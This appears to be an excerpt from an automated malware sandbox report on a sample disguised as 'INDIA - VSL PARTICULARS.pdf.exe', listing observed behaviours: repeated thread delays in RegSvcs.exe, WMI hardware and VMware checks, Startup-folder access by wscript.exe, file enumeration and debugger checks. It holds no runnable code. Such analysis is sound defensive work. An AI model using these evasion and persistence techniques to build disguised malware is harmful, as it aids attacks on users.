    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599324Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599215Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598973Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598849Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596384Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596273Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1551Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8269Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1941Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7903Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87579
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeAPI coverage: 3.6 %
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 3.8 %
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00452492
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00442886
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_004788BD
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,6_2_004339B6
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,6_2_0045CAFA
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00431A86
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,6_2_0044BD27
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0045DE8F FindFirstFileW,FindClose,6_2_0045DE8F
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_0044BF8B
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599525Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599243Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598891Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598781Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598672Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598188Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596141Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596031Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595922Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595688Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595453Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595344Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594330Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594200Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593888Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593782Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593657Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593532Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599324Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599215Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599109Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598973Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598849Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598281Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598171Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598062Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597953Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597047Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596828Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596384Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596273Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596166Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596047Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595266Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594813Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594563Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594453Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594344Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: name.exe, 00000006.00000002.2366368465.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#
    Source: name.exe, 00000008.00000002.2403136612.00000000008F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
    Source: wscript.exe, 00000005.00000002.2319453787.000001C4F23E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-86703
    Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_03F1F338 mov eax, dword ptr fs:[00000030h]0_2_03F1F338
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_03F20A08 mov eax, dword ptr fs:[00000030h]0_2_03F20A08
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_03F209A8 mov eax, dword ptr fs:[00000030h]0_2_03F209A8
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03FD1EB0 mov eax, dword ptr fs:[00000030h]2_2_03FD1EB0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03FD3520 mov eax, dword ptr fs:[00000030h]2_2_03FD3520
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03FD3580 mov eax, dword ptr fs:[00000030h]2_2_03FD3580
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1E6A0 mov eax, dword ptr fs:[00000030h]6_2_03F1E6A0
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1FD70 mov eax, dword ptr fs:[00000030h]6_2_03F1FD70
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_03F1FD10 mov eax, dword ptr fs:[00000030h]6_2_03F1FD10
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_03F91EB0 mov eax, dword ptr fs:[00000030h]8_2_03F91EB0
